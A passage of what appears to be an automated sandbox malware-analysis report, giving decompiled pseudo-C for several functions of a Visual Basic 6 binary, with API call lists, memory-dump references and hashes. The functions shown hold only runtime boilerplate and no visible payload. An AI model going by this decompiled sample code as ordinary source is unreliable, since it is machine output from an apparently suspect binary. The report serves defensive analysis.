					_push(_v84);
					_push(_v88);
					L00401324();
					_v100 = _t40;
				}
				L004012E2();
				_push(0x413492);
				L00401312();
				L00401312();
				return _t40;
			}

















                                                          0x00413390
                                                          0x0041339b
                                                          0x0041339c
                                                          0x004133a3
                                                          0x004133a6
                                                          0x004133ae
                                                          0x004133b1
                                                          0x004133be
                                                          0x004133c9
                                                          0x004133d5
                                                          0x004133ef
                                                          0x004133d7
                                                          0x004133d7
                                                          0x004133dc
                                                          0x004133e1
                                                          0x004133e6
                                                          0x004133e6
                                                          0x0041340a
                                                          0x0041340e
                                                          0x00413413
                                                          0x00413416
                                                          0x0041341a
                                                          0x00413424
                                                          0x0041342e
                                                          0x0041342f
                                                          0x00413430
                                                          0x00413431
                                                          0x0041343a
                                                          0x00413440
                                                          0x00413442
                                                          0x00413449
                                                          0x00413465
                                                          0x0041344b
                                                          0x0041344b
                                                          0x00413450
                                                          0x00413455
                                                          0x00413458
                                                          0x0041345b
                                                          0x00413460
                                                          0x00413460
                                                          0x0041346c
                                                          0x00413471
                                                          0x00413484
                                                          0x0041348c
                                                          0x00413491

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 004133A6
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004133BE
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004133C9
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00401216), ref: 004133E1
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041340E
                                                          • __vbaChkstk.MSVBVM60(?,00000000), ref: 00413424
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000001B8), ref: 0041345B
                                                          • __vbaFreeObj.MSVBVM60 ref: 0041346C
                                                          • __vbaFreeVar.MSVBVM60(00413492), ref: 00413484
                                                          • __vbaFreeVar.MSVBVM60(00413492), ref: 0041348C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Free$Chkstk$CheckHresultNew2
                                                          • String ID:
                                                          • API String ID: 2096563423-0
                                                          • Opcode ID: 24391df2dc0dfd2f0301dff3d84252d8d9f6a3f62270a23ea583e77be1bd5a64
                                                          • Instruction ID: 6e82a43384085d0546b4fcdd75c15ea226380a4185e8f75da88caf379108c224
                                                          • Opcode Fuzzy Hash: 24391df2dc0dfd2f0301dff3d84252d8d9f6a3f62270a23ea583e77be1bd5a64
                                                          • Instruction Fuzzy Hash: FD310570940208AFCB10EFD1C84ABDEBBB9BF48709F10446EF501BB1A5DBB96945DB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041287D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E0041287D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				signed int _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _t53;
				signed int _t58;
				signed int _t59;
				void* _t67;
				void* _t69;
				intOrPtr _t70;

				_t70 = _t69 - 0xc;
				 *[fs:0x0] = _t70;
				L00401210();
				_v16 = _t70;
				_v12 = 0x401158;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x401216, _t67);
				if( *0x41446c != 0) {
					_v72 = 0x41446c;
				} else {
					_push(0x41446c);
					_push(0x404e78);
					L004012EE();
					_v72 = 0x41446c;
				}
				_t9 =  &_v72; // 0x41446c
				_v44 =  *((intOrPtr*)( *_t9));
				_t53 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v40);
				asm("fclex");
				_v48 = _t53;
				if(_v48 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x404e68);
					_push(_v44);
					_push(_v48);
					L00401324();
					_v76 = _t53;
				}
				_v52 = _v40;
				_t58 =  *((intOrPtr*)( *_v52 + 0xf8))(_v52,  &_v36);
				asm("fclex");
				_v56 = _t58;
				if(_v56 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x404e8c);
					_push(_v52);
					_push(_v56);
					L00401324();
					_v80 = _t58;
				}
				_t59 = _v36;
				_v68 = _t59;
				_v36 = _v36 & 0x00000000;
				L00401306();
				L004012E2();
				_push(0x4129a1);
				L004012FA();
				return _t59;
			}























                                                          0x00412880
                                                          0x0041288f
                                                          0x00412899
                                                          0x004128a1
                                                          0x004128a4
                                                          0x004128ab
                                                          0x004128ba
                                                          0x004128c4
                                                          0x004128de
                                                          0x004128c6
                                                          0x004128c6
                                                          0x004128cb
                                                          0x004128d0
                                                          0x004128d5
                                                          0x004128d5
                                                          0x004128e5
                                                          0x004128ea
                                                          0x004128f9
                                                          0x004128fc
                                                          0x004128fe
                                                          0x00412905
                                                          0x0041291e
                                                          0x00412907
                                                          0x00412907
                                                          0x00412909
                                                          0x0041290e
                                                          0x00412911
                                                          0x00412914
                                                          0x00412919
                                                          0x00412919
                                                          0x00412925
                                                          0x00412934
                                                          0x0041293a
                                                          0x0041293c
                                                          0x00412943
                                                          0x0041295f
                                                          0x00412945
                                                          0x00412945
                                                          0x0041294a
                                                          0x0041294f
                                                          0x00412952
                                                          0x00412955
                                                          0x0041295a
                                                          0x0041295a
                                                          0x00412963
                                                          0x00412966
                                                          0x00412969
                                                          0x00412973
                                                          0x0041297b
                                                          0x00412980
                                                          0x0041299b
                                                          0x004129a0

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412899
                                                          • __vbaNew2.MSVBVM60(00404E78,0041446C,?,?,?,?,00401216), ref: 004128D0
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E68,00000014), ref: 00412914
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E8C,000000F8), ref: 00412955
                                                          • __vbaStrMove.MSVBVM60 ref: 00412973
                                                          • __vbaFreeObj.MSVBVM60 ref: 0041297B
                                                          • __vbaFreeStr.MSVBVM60(004129A1), ref: 0041299B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
                                                          • String ID: lDA
                                                          • API String ID: 1253681662-725749841
                                                          • Opcode ID: 0d7c80350db2843337019c8690a5424ce932620ab144811fc3b2f901415fd0a1
                                                          • Instruction ID: 7b394c800e46170b198f0f63ac580b108d5f46a57da8cf4c653e1dae6748c326
                                                          • Opcode Fuzzy Hash: 0d7c80350db2843337019c8690a5424ce932620ab144811fc3b2f901415fd0a1
                                                          • Instruction Fuzzy Hash: D131C1B1E40208EFCB10EF99C985BDDBBB5BF48714F10806AE501B72A1C7B85995DF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004135C4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 61%
                                                          			E004135C4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v44;
				void* _v52;
				void* _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _t51;
				signed int _t56;
				short _t57;
				void* _t65;
				void* _t67;
				intOrPtr _t68;

				_t68 = _t67 - 0xc;
				 *[fs:0x0] = _t68;
				L00401210();
				_v16 = _t68;
				_v12 = 0x401200;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401216, _t65);
				L004012DC();
				if( *0x41446c != 0) {
					_v84 = 0x41446c;
				} else {
					_push(0x41446c);
					_push(0x404e78);
					L004012EE();
					_v84 = 0x41446c;
				}
				_t11 =  &_v84; // 0x41446c
				_v60 =  *((intOrPtr*)( *_t11));
				_t51 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v52);
				asm("fclex");
				_v64 = _t51;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x404e68);
					_push(_v60);
					_push(_v64);
					L00401324();
					_v88 = _t51;
				}
				_v68 = _v52;
				_t56 =  *((intOrPtr*)( *_v68 + 0xc0))(_v68,  &_v56);
				asm("fclex");
				_v72 = _t56;
				if(_v72 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0xc0);
					_push(0x404e8c);
					_push(_v68);
					_push(_v72);
					L00401324();
					_v92 = _t56;
				}
				_t57 = _v56;
				_v28 = _t57;
				L004012E2();
				asm("wait");
				_push(0x4136df);
				L00401312();
				return _t57;
			}























                                                          0x004135c7
                                                          0x004135d6
                                                          0x004135e0
                                                          0x004135e8
                                                          0x004135eb
                                                          0x004135f2
                                                          0x00413601
                                                          0x0041360a
                                                          0x00413616
                                                          0x00413630
                                                          0x00413618
                                                          0x00413618
                                                          0x0041361d
                                                          0x00413622
                                                          0x00413627
                                                          0x00413627
                                                          0x00413637
                                                          0x0041363c
                                                          0x0041364b
                                                          0x0041364e
                                                          0x00413650
                                                          0x00413657
                                                          0x00413670
                                                          0x00413659
                                                          0x00413659
                                                          0x0041365b
                                                          0x00413660
                                                          0x00413663
                                                          0x00413666
                                                          0x0041366b
                                                          0x0041366b
                                                          0x00413677
                                                          0x00413686
                                                          0x0041368c
                                                          0x0041368e
                                                          0x00413695
                                                          0x004136b1
                                                          0x00413697
                                                          0x00413697
                                                          0x0041369c
                                                          0x004136a1
                                                          0x004136a4
                                                          0x004136a7
                                                          0x004136ac
                                                          0x004136ac
                                                          0x004136b5
                                                          0x004136b9
                                                          0x004136c0
                                                          0x004136c5
                                                          0x004136c6
                                                          0x004136d9
                                                          0x004136de

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 004135E0
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 0041360A
                                                          • __vbaNew2.MSVBVM60(00404E78,0041446C,?,?,?,?,00401216), ref: 00413622
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E68,00000014), ref: 00413666
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E8C,000000C0), ref: 004136A7
                                                          • __vbaFreeObj.MSVBVM60 ref: 004136C0
                                                          • __vbaFreeVar.MSVBVM60(004136DF), ref: 004136D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$CheckFreeHresult$ChkstkNew2
                                                          • String ID: lDA
                                                          • API String ID: 304406766-725749841
                                                          • Opcode ID: f36da0fc07523dbcde931fc714bac548afbac62835b2ef9c87d39100c8f068ba
                                                          • Instruction ID: 2fa4bb1aa32999608856c1a06b2316b072dee37f0a9427e88b509e43d27422e1
                                                          • Opcode Fuzzy Hash: f36da0fc07523dbcde931fc714bac548afbac62835b2ef9c87d39100c8f068ba
                                                          • Instruction Fuzzy Hash: 8331CC70900248EFDB10EFD5D989BDDBBB4BF48705F20406AF501BB2A1D7786A89CB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041265A, Relevance: 12.1, APIs: 8, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E0041265A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v48;
				signed int _v56;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v84;
				signed int _v88;
				char* _t40;
				signed int _t44;
				void* _t57;
				void* _t59;
				intOrPtr _t60;

				_t60 = _t59 - 0xc;
				 *[fs:0x0] = _t60;
				L00401210();
				_v16 = _t60;
				_v12 = 0x401138;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401216, _t57);
				L004012DC();
				if( *0x414010 != 0) {
					_v84 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v84 = 0x414010;
				}
				_t40 =  &_v48;
				L004012E8();
				_v68 = _t40;
				_v56 = _v56 & 0x00000000;
				_v64 = 2;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t44 =  *((intOrPtr*)( *_v68 + 0x1b8))(_v68, 0x10, _t40,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x344))( *_v84));
				asm("fclex");
				_v72 = _t44;
				if(_v72 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x404e10);
					_push(_v68);
					_push(_v72);
					L00401324();
					_v88 = _t44;
				}
				L004012E2();
				asm("wait");
				_push(0x412762);
				L00401312();
				return _t44;
			}



















                                                          0x0041265d
                                                          0x0041266c
                                                          0x00412676
                                                          0x0041267e
                                                          0x00412681
                                                          0x00412688
                                                          0x00412697
                                                          0x004126a0
                                                          0x004126ac
                                                          0x004126c6
                                                          0x004126ae
                                                          0x004126ae
                                                          0x004126b3
                                                          0x004126b8
                                                          0x004126bd
                                                          0x004126bd
                                                          0x004126e1
                                                          0x004126e5
                                                          0x004126ea
                                                          0x004126ed
                                                          0x004126f1
                                                          0x004126fb
                                                          0x00412705
                                                          0x00412706
                                                          0x00412707
                                                          0x00412708
                                                          0x00412711
                                                          0x00412717
                                                          0x00412719
                                                          0x00412720
                                                          0x0041273c
                                                          0x00412722
                                                          0x00412722
                                                          0x00412727
                                                          0x0041272c
                                                          0x0041272f
                                                          0x00412732
                                                          0x00412737
                                                          0x00412737
                                                          0x00412743
                                                          0x00412748
                                                          0x00412749
                                                          0x0041275c
                                                          0x00412761

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412676
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004126A0
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00401216), ref: 004126B8
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004126E5
                                                          • __vbaChkstk.MSVBVM60(?,00000000), ref: 004126FB
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000001B8), ref: 00412732
                                                          • __vbaFreeObj.MSVBVM60 ref: 00412743
                                                          • __vbaFreeVar.MSVBVM60(00412762), ref: 0041275C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$ChkstkFree$CheckHresultNew2
                                                          • String ID:
                                                          • API String ID: 2807847221-0
                                                          • Opcode ID: 1d5831516b0992c5b47006146ebd3d180c00064eef801c63838a2712a3d47bc3
                                                          • Instruction ID: 4066b22e1b0cb62602ef936e395b7436b66d1a7e9fd0a7fa61018036e130bf42
                                                          • Opcode Fuzzy Hash: 1d5831516b0992c5b47006146ebd3d180c00064eef801c63838a2712a3d47bc3
                                                          • Instruction Fuzzy Hash: D0312970940208EFCB10EFD1C946BDEBBB5BF48704F10846AF501BB2A1C7B96955DB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00412AC8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 60%
                                                          			E00412AC8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _t48;
				signed int _t53;
				short _t54;
				void* _t59;
				void* _t61;
				intOrPtr _t62;

				_t62 = _t61 - 0xc;
				 *[fs:0x0] = _t62;
				L00401210();
				_v16 = _t62;
				_v12 = 0x401178;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401216, _t59);
				if( *0x41446c != 0) {
					_v68 = 0x41446c;
				} else {
					_push(0x41446c);
					_push(0x404e78);
					L004012EE();
					_v68 = 0x41446c;
				}
				_t9 =  &_v68; // 0x41446c
				_v44 =  *((intOrPtr*)( *_t9));
				_t48 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v36);
				asm("fclex");
				_v48 = _t48;
				if(_v48 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x404e68);
					_push(_v44);
					_push(_v48);
					L00401324();
					_v72 = _t48;
				}
				_v52 = _v36;
				_t53 =  *((intOrPtr*)( *_v52 + 0x68))(_v52,  &_v40);
				asm("fclex");
				_v56 = _t53;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x404e8c);
					_push(_v52);
					_push(_v56);
					L00401324();
					_v76 = _t53;
				}
				_t54 = _v40;
				_v28 = _t54;
				L004012E2();
				asm("wait");
				_push(0x412bca);
				return _t54;
			}






















                                                          0x00412acb
                                                          0x00412ada
                                                          0x00412ae4
                                                          0x00412aec
                                                          0x00412aef
                                                          0x00412af6
                                                          0x00412b05
                                                          0x00412b0f
                                                          0x00412b29
                                                          0x00412b11
                                                          0x00412b11
                                                          0x00412b16
                                                          0x00412b1b
                                                          0x00412b20
                                                          0x00412b20
                                                          0x00412b30
                                                          0x00412b35
                                                          0x00412b44
                                                          0x00412b47
                                                          0x00412b49
                                                          0x00412b50
                                                          0x00412b69
                                                          0x00412b52
                                                          0x00412b52
                                                          0x00412b54
                                                          0x00412b59
                                                          0x00412b5c
                                                          0x00412b5f
                                                          0x00412b64
                                                          0x00412b64
                                                          0x00412b70
                                                          0x00412b7f
                                                          0x00412b82
                                                          0x00412b84
                                                          0x00412b8b
                                                          0x00412ba4
                                                          0x00412b8d
                                                          0x00412b8d
                                                          0x00412b8f
                                                          0x00412b94
                                                          0x00412b97
                                                          0x00412b9a
                                                          0x00412b9f
                                                          0x00412b9f
                                                          0x00412ba8
                                                          0x00412bac
                                                          0x00412bb3
                                                          0x00412bb8
                                                          0x00412bb9
                                                          0x00000000

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412AE4
                                                          • __vbaNew2.MSVBVM60(00404E78,0041446C,?,?,?,?,00401216), ref: 00412B1B
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E68,00000014), ref: 00412B5F
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E8C,00000068), ref: 00412B9A
                                                          • __vbaFreeObj.MSVBVM60 ref: 00412BB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$CheckHresult$ChkstkFreeNew2
                                                          • String ID: lDA
                                                          • API String ID: 1616694062-725749841
                                                          • Opcode ID: e39ac65ebc7deba7b538d814755800a6965bd2810b4a270b49f53a04e1d301df
                                                          • Instruction ID: d8757a3242bc893cf5002832a493ec7c4f67ef763172cb51316bc240be94e198
                                                          • Opcode Fuzzy Hash: e39ac65ebc7deba7b538d814755800a6965bd2810b4a270b49f53a04e1d301df
                                                          • Instruction Fuzzy Hash: F431BE75940208EFCB10EF94C985BDDBBB5BF48714F20406AE501B62A1C3B86995DFA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00412BF1, Relevance: 10.6, APIs: 7, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E00412BF1(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, signed int* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v80;
				signed int _v84;
				char* _t38;
				signed int _t41;
				void* _t52;
				void* _t54;
				intOrPtr _t55;

				_t55 = _t54 - 0xc;
				 *[fs:0x0] = _t55;
				L00401210();
				_v16 = _t55;
				_v12 = 0x401188;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401216, _t52);
				L004012DC();
				 *_a32 =  *_a32 & 0x00000000;
				if( *0x414010 != 0) {
					_v80 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v80 = 0x414010;
				}
				_t38 =  &_v60;
				L004012E8();
				_v64 = _t38;
				_t41 =  *((intOrPtr*)( *_v64 + 0x1ac))(_v64, _t38,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x334))( *_v80));
				asm("fclex");
				_v68 = _t41;
				if(_v68 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x404e10);
					_push(_v64);
					_push(_v68);
					L00401324();
					_v84 = _t41;
				}
				L004012E2();
				_push(0x412cf4);
				L00401312();
				return _t41;
			}

















                                                          0x00412bf4
                                                          0x00412c03
                                                          0x00412c0d
                                                          0x00412c15
                                                          0x00412c18
                                                          0x00412c1f
                                                          0x00412c2e
                                                          0x00412c37
                                                          0x00412c3f
                                                          0x00412c49
                                                          0x00412c63
                                                          0x00412c4b
                                                          0x00412c4b
                                                          0x00412c50
                                                          0x00412c55
                                                          0x00412c5a
                                                          0x00412c5a
                                                          0x00412c7e
                                                          0x00412c82
                                                          0x00412c87
                                                          0x00412c92
                                                          0x00412c98
                                                          0x00412c9a
                                                          0x00412ca1
                                                          0x00412cbd
                                                          0x00412ca3
                                                          0x00412ca3
                                                          0x00412ca8
                                                          0x00412cad
                                                          0x00412cb0
                                                          0x00412cb3
                                                          0x00412cb8
                                                          0x00412cb8
                                                          0x00412cc4
                                                          0x00412cc9
                                                          0x00412cee
                                                          0x00412cf3

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412C0D
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 00412C37
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00401216), ref: 00412C55
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412C82
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000001AC), ref: 00412CB3
                                                          • __vbaFreeObj.MSVBVM60 ref: 00412CC4
                                                          • __vbaFreeVar.MSVBVM60(00412CF4), ref: 00412CEE
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Free$CheckChkstkHresultNew2
                                                          • String ID:
                                                          • API String ID: 1725699769-0
                                                          • Opcode ID: 7adbe02cc896bbb1fc0ea5f2caba5ef23b016cb433a6624dcc933ff7b6d53161
                                                          • Instruction ID: 94e091dde035b08772c93ebc0682259f1aff20cae6aee0fe6f4bc4efc2d779df
                                                          • Opcode Fuzzy Hash: 7adbe02cc896bbb1fc0ea5f2caba5ef23b016cb433a6624dcc933ff7b6d53161
                                                          • Instruction Fuzzy Hash: 6F211570A00208EFCB10EFA5D985BDDBBB4FF48704F10846AF501BB2A1D7B95951DB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00412789, Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 49%
                                                          			E00412789(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				signed int _v32;
				intOrPtr _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v56;
				signed int _v60;
				char* _t30;
				signed int _t34;
				intOrPtr _t47;

				_push(0x401216);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_push(0x28);
				L00401210();
				_v12 = _t47;
				_v8 = 0x401148;
				if( *0x414010 != 0) {
					_v56 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x40509c);
					L004012EE();
					_v56 = 0x414010;
				}
				_t30 =  &_v24;
				L004012E8();
				_v44 = _t30;
				_v32 = _v32 & 0x00000000;
				_v40 = 2;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t34 =  *((intOrPtr*)( *_v44 + 0x1d4))(_v44, 0x10, _t30,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x308))( *_v56));
				asm("fclex");
				_v48 = _t34;
				if(_v48 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1d4);
					_push(0x404e38);
					_push(_v44);
					_push(_v48);
					L00401324();
					_v60 = _t34;
				}
				L004012E2();
				_push(0x41286a);
				return _t34;
			}















                                                          0x0041278e
                                                          0x00412799
                                                          0x0041279a
                                                          0x004127a1
                                                          0x004127a4
                                                          0x004127ac
                                                          0x004127af
                                                          0x004127bd
                                                          0x004127d7
                                                          0x004127bf
                                                          0x004127bf
                                                          0x004127c4
                                                          0x004127c9
                                                          0x004127ce
                                                          0x004127ce
                                                          0x004127f2
                                                          0x004127f6
                                                          0x004127fb
                                                          0x004127fe
                                                          0x00412802
                                                          0x0041280c
                                                          0x00412816
                                                          0x00412817
                                                          0x00412818
                                                          0x00412819
                                                          0x00412822
                                                          0x00412828
                                                          0x0041282a
                                                          0x00412831
                                                          0x0041284d
                                                          0x00412833
                                                          0x00412833
                                                          0x00412838
                                                          0x0041283d
                                                          0x00412840
                                                          0x00412843
                                                          0x00412848
                                                          0x00412848
                                                          0x00412854
                                                          0x00412859
                                                          0x00000000

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 004127A4
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00401216), ref: 004127C9
                                                          • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401216), ref: 004127F6
                                                          • __vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401216), ref: 0041280C
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E38,000001D4,?,?,?,?,?,?,?,?,?,?,00401216), ref: 00412843
                                                          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401216), ref: 00412854
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Chkstk$CheckFreeHresultNew2
                                                          • String ID:
                                                          • API String ID: 3189907775-0
                                                          • Opcode ID: 0160803c94738c69f9d73cf31d51a047f8816951624092882a41efeca7d93d00
                                                          • Instruction ID: 5dfdfbc8a732898c3174d73b70b40e0474b89d3f6d308c2140d65757ac58f96e
                                                          • Opcode Fuzzy Hash: 0160803c94738c69f9d73cf31d51a047f8816951624092882a41efeca7d93d00
                                                          • Instruction Fuzzy Hash: DB213D71940608EFCB10DFD1D989BDEBBB9EF48714F20446AF101B72A0C7B95980DB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041255A, Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                          Download Yara Rule
